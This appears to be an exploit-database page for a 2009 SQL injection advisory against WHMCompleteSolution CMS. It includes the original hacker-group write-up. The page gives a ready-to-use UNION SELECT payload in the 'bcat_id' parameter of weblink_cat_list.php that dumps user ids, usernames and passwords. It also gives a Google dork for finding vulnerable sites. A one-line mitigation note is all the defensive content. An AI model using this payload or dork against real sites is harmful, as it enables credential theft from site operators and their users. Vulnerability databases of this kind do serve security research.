header-logo
Suggest Exploit
vendor:
WHMCompleteSolution CMS
by:
Dr.0rYX and Cr3w-DZ
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WHMCompleteSolution CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WHMCompleteSolution CMS sql Injection Vulnerability

WHMCompleteSolution CMS is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a specially crafted SQL query that can be used to extract sensitive information from the database, such as usernames and passwords. The vulnerable file is http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]. The exploit is http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in a SQL query.
Source

Exploit-DB raw data:

                                                    ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************

[!]            WHMCompleteSolution CMS sql Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script   : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="

**************************************************************************/
[ Vulnerable File ]

http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]

[ Exploit ]

http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user


[  GReets ]

[+] :CLAW , le0n , HIS0K4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS